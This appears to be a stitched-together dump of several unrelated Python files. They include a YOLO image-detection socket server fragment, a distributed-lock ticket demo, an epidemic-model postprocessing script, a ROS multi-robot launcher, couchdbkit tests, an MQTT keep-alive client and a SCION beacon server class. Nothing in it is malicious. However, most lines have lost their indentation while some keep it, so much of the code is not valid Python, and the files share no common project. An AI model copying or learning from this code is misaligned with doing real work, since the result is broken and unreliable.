#print "receiving %d bytes" % size
while len(data) < size:
data += client.recv(1024)
frame_data = data[:size]
data = data[size:]
    imgdata = np.frombuffer(frame_data, dtype='uint8')
decimg = cv2.imdecode(imgdata,1)
return decimg
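# Wire format shared by recImage/recv_image_from_socket: the client sends a 4-byte
# network-order ('!i') length prefix followed by that many JPEG-encoded bytes, which are
# decoded back into a BGR frame with cv2.imdecode.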
def detect(net, meta, image, thresh=.5, hier_thresh=.5, nms=.45):
global QUATO
#check if image is an OpenCV frame
if isinstance(image, np.ndarray):
#StartTime0 = time.time()
# GET C,H,W, and DATA values
#print ('1')
img = image.transpose(2, 0, 1)
c, h, w = img.shape[0], img.shape[1], img.shape[2]
nump_data = img.ravel() / 255.0
nump_data = np.ascontiguousarray(nump_data, dtype=np.float32)
# make c_type pointer to numpy array
ptr_data = nump_data.ctypes.data_as(POINTER(c_float))
# make IMAGE data type
im = IMAGE(w=w, h=h, c=c, data=ptr_data)
else:
im = load_image(image, 0, 0)
print ('2')
num = c_int(0)
pnum = pointer(num)
predict_image(net, im, QUATO)
dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)
num = pnum[0]
if (nms): do_nms_obj(dets, num, meta.classes, nms);
res = []
for j in range(num):
for i in range(meta.classes):
if dets[j].prob[i] > 0:
b = dets[j].bbox
classid = i
                classname = meta.names[i].decode('UTF-8')
                res.append((classname, dets[j].prob[i], (b.x, b.y, b.w, b.h), classid))
res = sorted(res, key=lambda x: -x[1])
#free_image(im)
free_detections(dets, num)
return res
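# detect() returns a list of (class_name, confidence, (x_center, y_center, width, height),
# class_id) tuples sorted by descending confidence; `thresh` filters weak detections and
# `nms` suppresses overlapping boxes.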
# display the pic after detecting
def showPicResult(r,im,frameID):
for i in range(len(r)):
x1=r[i][2][0]-r[i][2][2]/2
y1=r[i][2][1]-r[i][2][3]/2
x2=r[i][2][0]+r[i][2][2]/2
y2=r[i][2][1]+r[i][2][3]/2
color = COLORS[r[i][3]]
cv2.rectangle(im,(int(x1),int(y1)),(int(x2),int(y2)),color,2)
#putText
x3 = int(x1+5)
y3 = int(y1-10)
font = cv2.FONT_HERSHEY_SIMPLEX
text = "{}: {:.4f}".format(str(r[i][0]), float(r[i][1]))
        if ((x3 <= im.shape[1]) and (y3 >= 0)):  # shape[1] is the image width
            cv2.putText(im, text, (x3, y3), font, 0.5, color, 1, cv2.LINE_AA)
        else:
            cv2.putText(im, text, (int(x1), int(y1 + 6)), font, 0.5, color, 1, cv2.LINE_AA)
#if frameID>= 45 and frameID<=50:
# cv2.imwrite("/home/nvidia/Desktop/haoxin/images/newNexus320/320off/image%3d.bmp" %frameID,im)
cv2.imshow('Detection Window', im)
#cv2.waitKey(0)
#cv2.destroyAllWindows()
if __name__ == "__main__":
t1 = threading.Thread(target = connect_controller)
t1.setDaemon(True)
t1.start()
    detect_net = load_net(b"./cfg/yolov3-320.cfg", b"yolov3.weights", 0)
    detect_meta = load_meta(b"cfg/coco.data")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind((HOST,USER_PORT))
s.listen(10)
client,addr=s.accept()
print ("Get new user socket")
data = b''
frameID = 1
starttime = time.time()
q = Queue.Queue()
#q = Queue.LifoQueue()
#t = threading.Thread(target = recImage,args=(client,data,q))
#t.setDaemon(True)
#t.start()
StartTime = time.time()
while True:
decimg = recv_image_from_socket(client,data)
compTime = time.time()
result = detect(detect_net, detect_meta, decimg, thresh=0.7)
#print('comp: ' + str(time.time() - compTime))
#print('real: ' + str(0.14 + 4.63/(QUATO+0.454)))
str1 = '0'+'\n'
client.sendall(str1.encode())
Latency.append(time.time() - StartTime)
print('round-trip latency is ' + str(time.time() - StartTime))
StartTime = time.time()
|
interrupt.py
|
from distrilockper import Config
from distrilockper.lock_helper import DistributerLockHelper
import _thread
config = Config()
config.use_single_server().set_config(host='0.0.0.0', port=6379)
helper = DistributerLockHelper()
helper.create(config)
class ticketSalse():
def __init__(self):
self.ticket_count = 1
def buy(self):
print('run')
_thread.exit()
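        # _thread.exit() raises SystemExit in this worker thread, so everything below this
        # point (including the whole distributed-lock / ticket-selling section) never runs:
        # each buy() call prints 'run' and then terminates immediately.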
print("kill")
Locker1 = helper.get_reentrant_lock(key='ticketSalse')
re1 = Locker1.try_lock(2, 10, 'second')
print("get lock:", re1)
if re1:
if self.ticket_count > 0:
self.ticket_count -= 1
print("sale one, remain: ", self.ticket_count)
Locker1.unlock()
Locker1.unlock()
else:
print("get lock failed")
print(self.ticket_count)
def ticket_num(self):
print(self.ticket_count)
import threading
import time
sale = ticketSalse()
threads = []
for i in range(100):
# print(i)
threads.append(threading.Thread(target = sale.buy))
threads[i].start()
|
postprocess.py
|
"""Postprocesses data across dates and simulation runs before aggregating at geographic levels (ADM0, ADM1, or ADM2)."""
import argparse
import gc
import glob
import logging
import os
from multiprocessing import JoinableQueue, Pool, Process
from pathlib import Path
import numpy as np
import pandas as pd
import tqdm
from .numerical_libs import use_cupy
from .util.read_config import bucky_cfg
from .viz.geoid import read_geoid_from_graph, read_lookup
def divide_by_pop(dataframe, cols):
"""Given a dataframe and list of columns, divides the columns by the population column ('N').
Parameters
----------
dataframe : DataFrame
Simulation data
cols : list of str
Column names to scale by population
Returns
-------
dataframe : DataFrame
Original dataframe with the requested columns scaled
"""
for col in cols:
dataframe[col] = dataframe[col] / dataframe["total_population"]
return dataframe
# Initialize argument parser
parser = argparse.ArgumentParser(description="Bucky Model postprocessing")
# Required: File to process
parser.add_argument(
"file",
default=max(
glob.glob(bucky_cfg["raw_output_dir"] + "/*/"),
key=os.path.getctime,
default="Most recently created folder in raw_output_dir",
),
nargs="?",
type=str,
    help="File to process",
)
# Graph file used for this run. Defaults to most recently created
parser.add_argument(
"-g",
"--graph_file",
default=None,
type=str,
help="Graph file used for simulation",
)
# Aggregation levels, e.g. state, county, etc.
parser.add_argument(
"-l",
"--levels",
default=["adm0", "adm1", "adm2"],
nargs="+",
type=str,
help="Levels on which to aggregate",
)
# Quantiles
default_quantiles = [
0.01,
0.025,
0.050,
0.100,
0.150,
0.200,
0.250,
0.300,
0.350,
0.400,
0.450,
0.500,
0.550,
0.600,
0.650,
    0.700,
    0.750,
    0.800,
    0.850,
    0.900,
    0.950,
0.975,
0.990,
]
parser.add_argument(
"-q",
"--quantiles",
default=default_quantiles,
nargs="+",
type=float,
help="Quantiles to process",
)
# Top-level output directory
parser.add_argument(
"-o",
"--output",
default=bucky_cfg["output_dir"],
type=str,
help="Directory for output files",
)
# Prefix for filenames
parser.add_argument(
"--prefix",
default=None,
type=str,
help="Prefix for output folder (default is UUID)",
)
# Specify optional end date
parser.add_argument("--end_date", default=None, type=str)
# Can pass in a lookup table to use in place of graph
parser.add_argument(
"--lookup",
default=None,
type=str,
help="Lookup table defining geoid relationships",
)
parser.add_argument(
"-n",
"--nprocs",
default=1,
type=int,
help="Number of threads doing aggregations, more is better till you go OOM...",
)
parser.add_argument("-cpu", "--cpu", action="store_true", help="Do not use cupy")
parser.add_argument("--verify", action="store_true", help="Verify the quality of the data")
parser.add_argument(
"--no-sort",
"--no_sort",
action="store_true",
help="Skip sorting the aggregated files",
)
# Optional flags
parser.add_argument("-v", "--verbose", action="store_true", help="Print extra information")
if __name__ == "__main__":
args = parser.parse_args()
# set_start_method("fork")
# Start parsing args
quantiles = args.quantiles
verbose = args.verbose
prefix = args.prefix
use_gpu = not args.cpu
if verbose:
logging.info(args)
# File Management
top_output_dir = args.output
# Check if it exists, make if not
if not os.path.exists(top_output_dir):
os.makedirs(top_output_dir)
# Use lookup, add prefix
if args.lookup is not None:
lookup_df = read_lookup(args.lookup)
if prefix is None:
prefix = Path(args.lookup).stem
else:
lookup_df = read_geoid_from_graph(args.graph_file)
# Create subfolder for this run using UUID of run
uuid = args.file.split("/")[-2]
if prefix is not None:
uuid = prefix + "_" + uuid
# Create directory if it doesn't exist
output_dir = os.path.join(top_output_dir, uuid)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# Get aggregation levels
agg_levels = args.levels
lookup_df = lookup_df.set_index("adm2")
admin2_key = "adm2_id"
all_files = glob.glob(args.file + "/*.feather")
all_files_df = pd.DataFrame(
[x.split("/")[-1].split(".")[0].split("_") for x in all_files],
columns=["rid", "date"],
)
dates = all_files_df.date.unique().tolist()
to_write = JoinableQueue()
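    # Single-writer pattern: the worker pool below aggregates one date per task and pushes
    # (filename, dataframe) pairs onto this JoinableQueue; the dedicated _writer process
    # appends each chunk to its CSV, emitting the header only on the first write per file.
    # A final None sentinel tells the writer to exit once every date has been processed.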
def _writer(q):
# Call to_write.get() until it returns None
has_header_dict = {}
for fname, df in iter(q.get, None):
if fname in has_header_dict:
df.to_csv(fname, header=False, mode="a")
else:
df.to_csv(fname, header=True, mode="w")
has_header_dict[fname] = True
q.task_done()
q.task_done()
write_thread = Process(target=_writer, args=(to_write,))
    write_thread.daemon = True
write_thread.start()
def _process_date(date, write_queue=to_write):
date_files = glob.glob(args.file + "/*_" + str(date) + ".feather") # [:NFILES]
# Read feather files
run_data = [pd.read_feather(f) for f in date_files]
tot_df = pd.concat(run_data)
# force GC to free up lingering cuda allocs
del run_data
gc.collect()
# Get start date of simulation
# start_date = tot_df["date"].min()
# If user passes in an end date, use it
if args.end_date is not None:
end_date = pd.to_datetime(args.end_date)
# Otherwise use last day in data
else:
end_date = tot_df["date"].max()
# Drop data not within requested time range
tot_df = tot_df.loc[(tot_df["date"] <= end_date)]
# Some lookups only contain a subset of counties, drop extras if necessary
        # TODO this could be replaced with a left join now that the keys are consistent (if it's faster)
unique_adm2 = lookup_df.index
tot_df = tot_df.loc[tot_df[admin2_key].isin(unique_adm2)]
# List of columns that will be output per 100k population as well
per_capita_cols = ["cumulative_reported_cases", "cumulative_deaths", "current_hospitalizations"]
# Multiply column by N, then at end divide by aggregated N
pop_mean_cols = ["case_reporting_rate", "R_eff", "doubling_t"]
for col in pop_mean_cols:
tot_df[col] = tot_df[col] * tot_df["total_population"]
# No columns should contain negatives or NaNs
nan_vals = tot_df.isna().sum()
if nan_vals.sum() > 0:
logging.error("NANs are present in output data: \n" + str(nan_vals))
if args.verify:
# Check all columns except date for negative values
if (
tot_df.drop(columns=["date"]).lt(-1).sum() > 0
).any(): # TODO this drop does a deep copy and is super slow
logging.error("Negative values are present in output data.")
# Check for floating point errors
if (tot_df.drop(columns=["date"]).lt(0).sum() > 0).any(): # TODO same here
logging.warning("Floating point errors are present in output data.")
# NB: this has to happen after we fork the process
# see e.g. https://github.com/chainer/chainer/issues/1087
if use_gpu:
use_cupy(optimize=True)
from .numerical_libs import xp # isort:skip # pylint: disable=import-outside-toplevel
for level in agg_levels:
logging.info("Currently processing: " + level)
if level != "adm2":
# Create a mapping for aggregation level
level_dict = lookup_df[level].to_dict()
levels = np.unique(list(level_dict.values()))
else:
levels = lookup_df.index.values
level_dict = {x: x for x in levels}
level_map = dict(enumerate(levels))
level_inv_map = {v: k for k, v in level_map.items()}
# Apply map
tot_df[level] = tot_df[admin2_key].map(level_dict).map(level_inv_map).astype(int)
# Compute quantiles
def quantiles_group(tot_df):
# TODO why is this in the for loop? pretty sure we can move it but check for deps
# Kernel opt currently only works on reductions (@v8.0.0) but maybe someday it'll help here
with xp.optimize_kernels():
# can we do this pivot in cupy?
tot_df_stacked = tot_df.stack()
tot_df_unstack = tot_df_stacked.unstack("rid")
percentiles = xp.array(quantiles) * 100.0
test = xp.percentile(xp.array(tot_df_unstack.to_numpy()), q=percentiles, axis=1)
q_df = (
pd.DataFrame(
xp.to_cpu(test.T),
index=tot_df_unstack.index,
columns=quantiles,
)
.unstack()
.stack(level=0)
.reset_index()
.rename(columns={"level_2": "quantile"})
)
return q_df
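            # Aggregation pipeline: sum adm2 rows up to `level` per (date, rid), then pivot the
            # Monte Carlo runs (rid) into columns and take the requested percentiles across runs,
            # producing one row per (level, date, quantile).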
g = tot_df.groupby([level, "date", "rid"]).sum().groupby(level)
q_df = g.apply(quantiles_group)
q_df[level] = q_df[level].round().astype(int).map(level_map)
q_df = q_df.set_index([level, "date", "quantile"])
per_cap_dict = {}
for col in per_capita_cols:
per_cap_dict[col + "_per_100k"] = (q_df[col] / q_df["total_population"]) * 100000.0
q_df = q_df.assign(**per_cap_dict)
q_df = divide_by_pop(q_df, pop_mean_cols)
# Column management
# if level != admin2_key:
del q_df[admin2_key]
if "adm2" in q_df.columns and level != "adm2":
del q_df["adm2"]
if "adm1" in q_df.columns and level != "adm1":
del q_df["adm1"]
if "adm0" in q_df.columns and level != "adm0":
del q_df["adm0"]
if verbose:
logging.info("\nQuantiles dataframe:")
logging.info(q_df.head())
# Push output df to write queue
write_queue.put((os.path.join(output_dir, level + "_quantiles.csv"), q_df))
pool = Pool(processes=args.nprocs)
for _ in tqdm.tqdm(
pool.imap_unordered(_process_date, dates),
total=len(dates),
desc="Postprocessing dates",
dynamic_ncols=True,
):
pass
pool.close()
pool.join() # wait until everything is done
to_write.join() # wait until queue is empty
to_write.put(None) # send signal to term loop
to_write.join() # wait until write_thread handles it
write_thread.join() # join the write_thread
# sort output csvs
if not args.no_sort:
for a_level in args.levels:
filename = os.path.join(output_dir, a_level + "_quantiles.csv")
logging.info("Sorting output file " + filename + "...")
out_df = pd.read_csv(filename)
# TODO we can avoid having to set index here once readable_column names is complete
# set index and sort them
out_df = out_df.set_index([a_level, "date", "quantile"]).sort_index()
# sort columns alphabetically
out_df = out_df.reindex(sorted(out_df.columns), axis=1)
# write out sorted csv
out_df = out_df.drop(columns="index") # TODO where did we pick this col up?
out_df.to_csv(filename, index=True)
logging.info("Done sort")
|
multi_process_agents.py
|
#!/usr/bin/env python
import multiprocessing
import rospy
from geometry_msgs.msg import Twist
from math import pow, atan2, sqrt
import numpy as np
from turtle_instance_laser_death_star import TurtleBot
'''
Description: This python file is responsible for creating multiple turtlebot instances
by using multiprocessing.
'''
k = 0
sp_x = [1,9,1,9]
sp_y = [1,9,9,1]
goal_x = [9,1,9,1]
goal_y = [9,1,1,9]
def multi_agents(agent_name,agent_obj,p_name):
'''
Description: Creates number of robots that user inputs.
'''
try:
agent_obj = TurtleBot(agent_name)
# agent_obj.start_point(sp_x,sp_y)
agent_obj.begin()
# agent_obj.move2goal_rvo(goal_x,goal_y)
except rospy.ROSInterruptException:
pass
user_input = int(input("Type no. of agents : "))
agent_names, agent_obj,p_name = [None] * (user_input), [None] * (user_input), [None] * (user_input)
#Equal distribution for start_point
#Temp fix for non-responding first turtle
l=0
for j in range(user_input):
i=j+2
agent_names[j] = "robot_" + str(j)
agent_obj[j] = "x" + str(j)
for i in agent_names:
p_name[k] = "p"+str(k)
p_name[k] = multiprocessing.Process(target=multi_agents, args=(agent_names[k], agent_obj[k], p_name, ))
k += 1
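# Each TurtleBot agent runs in its own OS process; the processes are started below and the
# main script then sleeps via rospy.sleep(10) while the spawned nodes start up.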
for i in p_name:
i.start()
rospy.sleep(10)
|
test_changes.py
|
# -*- coding: utf-8 -
#
# This file is part of couchdbkit released under the MIT license.
# See the NOTICE for more information.
#
__author__ = 'benoitc@e-engura.com (Benoît Chesneau)'
import threading
import time
try:
import unittest2 as unittest
except ImportError:
import unittest
from couchdbkit import *
from couchdbkit.changes import ChangesStream, fold, foreach
class ClientServerTestCase(unittest.TestCase):
def setUp(self):
self.server = Server()
self._delete_db()
self.db = self.server.create_db("couchdbkit_test")
self.consumer = Consumer(self.db)
def tearDown(self):
self._delete_db()
def _delete_db(self):
try:
del self.server['couchdbkit_test']
except:
pass
def test_fetch(self):
# save a doc
doc = {}
self.db.save_doc(doc)
def fold_fun(c, acc):
acc.append(c)
return acc
changes = fold(self.db, fold_fun, [])
self.assertTrue(len(changes) == 1)
change = changes[0]
self.assertTrue(change["id"] == doc['_id'])
    def test_longpoll(self):
def test_change():
with ChangesStream(self.db, feed="longpoll") as stream:
for change in stream:
self.assertTrue(change["seq"] == 1)
t = threading.Thread(target=test_change)
t.daemon = True
t.start()
doc = {}
self.db.save_doc(doc)
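        # The longpoll stream in the worker thread blocks until the save_doc() call above
        # produces a change, which is expected to arrive with seq == 1 on the fresh database.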
def test_continuous(self):
lines = []
def test_change():
with ChangesStream(self.db, feed="continuous") as stream:
for change in stream:
lines.append(change)
t = threading.Thread(target=test_change)
t.daemon = True
t.start()
for i in range(5):
doc = {"_id": "test%s" % str(i)}
self.db.save_doc(doc)
self.db.ensure_full_commit()
time.sleep(0.3)
self.assertTrue(len(lines) == 5)
self.assertTrue(lines[4]["id"] == "test4")
doc = {"_id": "test5"}
self.db.save_doc(doc)
time.sleep(0.3)
self.assertTrue(len(lines) == 6)
self.assertTrue(lines[5]["id"] == "test5")
|
mqtt.py
|
# Copyright 2021 Nokia
# Licensed under the BSD 3-Clause Clear License.
# SPDX-License-Identifier: BSD-3-Clear
import paho.mqtt.client as mqtt
import a10.structures.identity
import a10.asvr.db.configuration
import threading
import time
import logging
def on_disconnect(client, userdata, rc):
    # paho-mqtt disconnect callback signature: (client, userdata, rc).
    # Merged from the two duplicate definitions: log the reason, flag the state,
    # and attempt a reconnect.
    logging.info("disconnecting reason " + str(rc))
    print("MQTT Disconnected")
    client.connected_flag = False
    client.disconnect_flag = True
    try:
        client.reconnect()
    except Exception:
        print("Connection is fscked")
def on_connect(client, metadata, flags, rc):
    print("Connected mqtt: {}".format(rc))
def publish(ch, t, op, data):
payload = str({"t": t, "op": op, "data": data})
mqttc.publish(ch, payload)
def sendKeepAlive():
print(
"Starting keepalive ping with rate ",
a10.asvr.db.configuration.MQTTKEEPALIVEPING,
)
while True:
print("ping!")
publish(
"AS/MQTTPING",
"ping",
"ping",
{"session": a10.asvr.db.configuration.ASSESSIONIDENTITY},
)
time.sleep(int(a10.asvr.db.configuration.MQTTKEEPALIVEPING))
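# sendKeepAlive() runs in a background thread (started below when MQTTKEEPALIVETHREAD is
# enabled) and publishes a ping on the "AS/MQTTPING" channel every MQTTKEEPALIVEPING
# seconds, carrying the AS session identity, presumably to keep the broker session active.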
print(a10.asvr.db.configuration.MQTTADDRESS)
#
# This is a bit nasty, but if two clients have the same name then the earlier one
# will be kicked off by the MQTT broker - at least in mosquitto
# So we will add the AS_Session_Identity and a UUID
#
id = (
a10.asvr.db.configuration.MQTTCLIENTNAME
+ "_"
+ a10.asvr.db.configuration.ASSESSIONIDENTITY
+ "_"
+ a10.structures.identity.generateID()
)
print("mqtt client id is ", id)
mqttc = mqtt.Client(id)
mqttc.on_connect = on_connect
mqttc.on_disconnect = on_disconnect  # register the disconnect handler defined above
mqttc.connect(a10.asvr.db.configuration.MQTTADDRESS, port=a10.asvr.db.configuration.MQTTPORT,
keepalive=int(a10.asvr.db.configuration.MQTTKEEPALIVEPING), bind_address="")
# KEEP ALIVE PING
if int(a10.asvr.db.configuration.MQTTKEEPALIVETHREAD) == 1:
    print("Starting keep alive thread")
keepalivethread = threading.Thread(target=sendKeepAlive)
print("Keep alive thread ID is ", keepalivethread)
keepalivethread.start()
else:
print("Keep alive thread disabled")
|
base.py
|
# Copyright 2014 ETH Zurich
# Copyright 2018 ETH Zurich, Anapaya Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`base` --- Base beacon server
==================================
"""
# Stdlib
import logging
import os
import threading
import time
from collections import defaultdict
from abc import ABCMeta, abstractmethod
from threading import RLock
# External packages
from prometheus_client import Counter, Gauge
# SCION
from beacon_server.if_state import InterfaceState
from lib.crypto.asymcrypto import get_sig_key
from lib.crypto.symcrypto import kdf
from lib.crypto.util import (
get_master_key,
MASTER_KEY_0,
MASTER_KEY_1
)
from lib.defines import (
EXP_TIME_UNIT,
GEN_CACHE_PATH,
MIN_REVOCATION_TTL,
PATH_POLICY_FILE,
)
from lib.errors import (
SCIONKeyError,
SCIONParseError,
SCIONPathPolicyViolated,
SCIONServiceLookupError,
)
from lib.msg_meta import UDPMetadata
from lib.packet.cert_mgmt import CertChainRequest, CertMgmt
from lib.packet.ext.one_hop_path import OneHopPathExt
from lib.path_seg_meta import PathSegMeta
from lib.packet.ctrl_pld import CtrlPayload
from lib.packet.ifid import IFIDPayload
from lib.packet.opaque_field import HopOpaqueField, InfoOpaqueField
from lib.packet.path import SCIONPath
from lib.packet.path_mgmt.base import PathMgmt
from lib.packet.path_mgmt.ifstate import (
IFStateInfo,
IFStatePayload,
IFStateRequest,
)
from lib.packet.path_mgmt.rev_info import RevocationInfo, SignedRevInfo
from lib.packet.pcb import (
ASMarking,
PCB,
PCBMarking,
)
from lib.packet.proto_sign import ProtoSignType
from lib.packet.scion_addr import ISD_AS
from lib.packet.signed_util import DefaultSignSrc
from lib.packet.svc import SVCType
from lib.packet.scmp.types import SCMPClass, SCMPPathClass
from lib.path_store import PathPolicy
from lib.rev_cache import RevCache
from lib.thread import thread_safety_net
from lib.types import (
CertMgmtType,
PathMgmtType as PMT,
PayloadClass,
ServiceType,
)
from lib.util import (
SCIONTime,
sleep_interval,
)
from lib.zk.cache import ZkSharedCache
from lib.zk.errors import ZkNoConnection
from lib.zk.id import ZkID
from lib.zk.zk import ZK_LOCK_SUCCESS, Zookeeper
from scion_elem.scion_elem import SCIONElement
# Exported metrics.
BEACONS_PROPAGATED = Counter("bs_beacons_propagated_total", "# of propagated beacons",
["server_id", "isd_as", "type"])
SEGMENTS_REGISTERED = Counter("bs_segments_registered_total", "# of registered segments",
["server_id", "isd_as", "type"])
REVOCATIONS_ISSUED = Counter("bs_revocations_issued_total", "# of issued revocations",
["server_id", "isd_as"])
IS_MASTER = Gauge("bs_is_master", "true if this process is the replication master",
["server_id", "isd_as"])
IF_STATE = Gauge("bs_ifstate", "0/1/2 if interface is active/revoked/other",
["server_id", "isd_as", "ifid"])
class BeaconServer(SCIONElement, metaclass=ABCMeta):
"""
The SCION PathConstructionBeacon Server.
"""
SERVICE_TYPE = ServiceType.BS
# ZK path for incoming PCBs
ZK_PCB_CACHE_PATH = "pcb_cache"
# ZK path for revocations.
ZK_REVOCATIONS_PATH = "rev_cache"
# Time revocation objects are cached in memory (in seconds).
ZK_REV_OBJ_MAX_AGE = MIN_REVOCATION_TTL
# Revocation TTL
REVOCATION_TTL = MIN_REVOCATION_TTL
# Revocation Overlapping (seconds)
REVOCATION_OVERLAP = 2
# Interval to checked for timed out interfaces.
IF_TIMEOUT_INTERVAL = 1
# Interval to send keep-alive msgs
IFID_INTERVAL = 1
# Interval between two consecutive requests (in seconds).
CERT_REQ_RATE = 10
def __init__(self, server_id, conf_dir, spki_cache_dir=GEN_CACHE_PATH,
prom_export=None, sciond_path=None):
"""
:param str server_id: server identifier.
:param str conf_dir: configuration directory.
:param str prom_export: prometheus export address.
:param str sciond_path: path to sciond socket.
"""
super().__init__(server_id, conf_dir, spki_cache_dir=spki_cache_dir,
prom_export=prom_export, sciond_path=sciond_path)
self.config = self._load_as_conf()
self.master_key_0 = get_master_key(self.conf_dir, MASTER_KEY_0)
self.master_key_1 = get_master_key(self.conf_dir, MASTER_KEY_1)
# TODO: add 2 policies
self.path_policy = PathPolicy.from_file(
os.path.join(conf_dir, PATH_POLICY_FILE))
self.signing_key = get_sig_key(self.conf_dir)
self.of_gen_key = kdf(self.master_key_0, b"Derive OF Key")
# Amount of time units a HOF is valid (time unit is EXP_TIME_UNIT).
self.default_hof_exp_time = int(self.config.segment_ttl / EXP_TIME_UNIT) - 1
self.ifid_state = {}
for ifid in self.ifid2br:
self.ifid_state[ifid] = InterfaceState()
self.ifid_state_lock = RLock()
self.if_revocations = {}
self.CTRL_PLD_CLASS_MAP = {
PayloadClass.PCB: {PayloadClass.PCB: self.handle_pcb},
PayloadClass.IFID: {PayloadClass.IFID: self.handle_ifid_packet},
PayloadClass.CERT: {
CertMgmtType.CERT_CHAIN_REQ: self.process_cert_chain_request,
CertMgmtType.CERT_CHAIN_REPLY: self.process_cert_chain_reply,
CertMgmtType.TRC_REPLY: self.process_trc_reply,
CertMgmtType.TRC_REQ: self.process_trc_request,
},
PayloadClass.PATH: {
PMT.IFSTATE_REQ: self._handle_ifstate_request,
PMT.REVOCATION: self._handle_revocation,
},
}
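        # CTRL_PLD_CLASS_MAP dispatches incoming control payloads to handlers keyed first by
        # payload class (PCB, IFID, CERT, PATH) and then by the message type within that class;
        # SCMP_PLD_CLASS_MAP below does the same for SCMP revocation notifications.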
self.SCMP_PLD_CLASS_MAP = {
SCMPClass.PATH: {
SCMPPathClass.REVOKED_IF: self._handle_scmp_revocation,
},
}
zkid = ZkID.from_values(self.addr.isd_as, self.id,
[(self.addr.host, self._port)]).pack()
self.zk = Zookeeper(self.addr.isd_as, self.SERVICE_TYPE, zkid,
self.topology.zookeepers)
self.zk.retry("Joining party", self.zk.party_setup)
self.pcb_cache = ZkSharedCache(
self.zk, self.ZK_PCB_CACHE_PATH, self._handle_pcbs_from_zk)
self.revobjs_cache = ZkSharedCache(
self.zk, self.ZK_REVOCATIONS_PATH, self.process_rev_objects)
self.local_rev_cache = RevCache()
self._rev_seg_lock = RLock()
def propagate_downstream_pcb(self, pcb):
"""
Propagates the beacon to all children.
:param pcb: path segment.
:type pcb: PathSegment
"""
propagated_pcbs = defaultdict(list)
prop_cnt = 0
for intf in self.topology.child_interfaces:
if not intf.to_if_id:
continue
new_pcb, meta = self._mk_prop_pcb_meta(
pcb.copy(), intf.isd_as, intf.if_id)
if not new_pcb:
continue
self.send_meta(CtrlPayload(new_pcb.pcb()), meta)
propagated_pcbs[(intf.isd_as, intf.if_id)].append(pcb.short_id())
prop_cnt += 1
if self._labels:
BEACONS_PROPAGATED.labels(**self._labels, type="down").inc(prop_cnt)
return propagated_pcbs
def _mk_prop_pcb_meta(self, pcb, dst_ia, egress_if):
ts = pcb.get_timestamp()
asm = self._create_asm(pcb.ifID, egress_if, ts, pcb.last_hof())
if not asm:
return None, None
pcb.add_asm(asm, ProtoSignType.ED25519, self.addr.isd_as.pack())
pcb.sign(self.signing_key)
one_hop_path = self._create_one_hop_path(egress_if)
return pcb, self._build_meta(ia=dst_ia, host=SVCType.BS_A,
path=one_hop_path, one_hop=True)
def _create_one_hop_path(self, egress_if):
ts = int(SCIONTime.get_time())
info = InfoOpaqueField.from_values(ts, self.addr.isd_as[0], hops=2)
hf1 = HopOpaqueField.from_values(OneHopPathExt.HOF_EXP_TIME, 0, egress_if)
hf1.set_mac(self.of_gen_key, ts, None)
# Return a path where second HF is empty.
return SCIONPath.from_values(info, [hf1, HopOpaqueField()])
def hof_exp_time(self, ts):
"""
Return the ExpTime based on IF timestamp and the certificate chain/TRC.
The certificate chain must be valid for the entire HOF lifetime.
:param int ts: IF timestamp
:return: HF ExpTime
:rtype: int
"""
cert_exp = self._get_my_cert().as_cert.expiration_time
max_exp_time = int((cert_exp-ts) / EXP_TIME_UNIT) - 1
return min(max_exp_time, self.default_hof_exp_time)
def _mk_if_info(self, if_id):
"""
Small helper method to make it easier to deal with ingress/egress
interface being 0 while building ASMarkings.
"""
d = {"remote_ia": ISD_AS.from_values(0, 0), "remote_if": 0, "mtu": 0}
if not if_id:
return d
br = self.ifid2br[if_id]
d["remote_ia"] = br.interfaces[if_id].isd_as
d["remote_if"] = br.interfaces[if_id].to_if_id
d["mtu"] = br.interfaces[if_id].mtu
return d
@abstractmethod
def handle_pcbs_propagation(self):
"""
Main loop to propagate received beacons.
"""
raise NotImplementedError
def _log_propagations(self, propagated_pcbs):
for (isd_as, if_id), pcbs in propagated_pcbs.items():
logging.debug("Propagated %d PCBs to %s via %s (%s)", len(pcbs),
isd_as, if_id, ", ".join(pcbs))
def _handle_pcbs_from_zk(self, pcbs):
"""
Handles cached pcbs through ZK, passed as a list.
"""
for pcb in pcbs:
try:
pcb = PCB.from_raw(pcb)
except SCIONParseError as e:
logging.error("Unable to parse raw pcb: %s", e)
continue
self.handle_pcb(CtrlPayload(pcb))
if pcbs:
logging.debug("Processed %s PCBs from ZK", len(pcbs))
def handle_pcb(self, cpld, meta=None):
"""
Handles pcbs received from the network.
"""
pcb = cpld.union
assert isinstance(pcb, PCB), type(pcb)
pcb = pcb.pseg()
if meta:
pcb.ifID = meta.path.get_hof().ingress_if
try:
self.path_policy.check_filters(pcb)
except SCIONPathPolicyViolated as e:
logging.debug("Segment dropped due to path policy: %s\n%s" %
(e, pcb.short_desc()))
return
if not self._filter_pcb(pcb):
logging.debug("Segment dropped due to looping: %s" %
pcb.short_desc())
return
seg_meta = PathSegMeta(pcb, self.continue_seg_processing, meta)
self._process_path_seg(seg_meta, cpld.req_id)
def continue_seg_processing(self, seg_meta):
"""
For every verified pcb received from the network or ZK
this function gets called to continue the processing for the pcb.
"""
pseg = seg_meta.seg
logging.debug("Successfully verified PCB %s", pseg.short_id())
if seg_meta.meta:
# Segment was received from network, not from zk. Share segment
# with other beacon servers in this AS.
entry_name = "%s-%s" % (pseg.get_hops_hash(hex=True), time.time())
try:
self.pcb_cache.store(entry_name, pseg.pcb().copy().pack())
except ZkNoConnection:
logging.error("Unable to store PCB in shared cache: "
"no connection to ZK")
self.handle_ext(pseg)
self._handle_verified_beacon(pseg)
def _filter_pcb(self, pcb, dst_ia=None):
return True
def handle_ext(self, pcb):
"""
Handle beacon extensions.
"""
# Handle PCB extensions
for asm in pcb.iter_asms():
pol = asm.routing_pol_ext()
if pol:
self.handle_routing_pol_ext(pol)
def handle_routing_pol_ext(self, ext):
# TODO(Sezer): Implement routing policy extension handling
logging.debug("Routing policy extension: %s" % ext)
@abstractmethod
def register_segments(self):
"""
Registers paths according to the received beacons.
"""
raise NotImplementedError
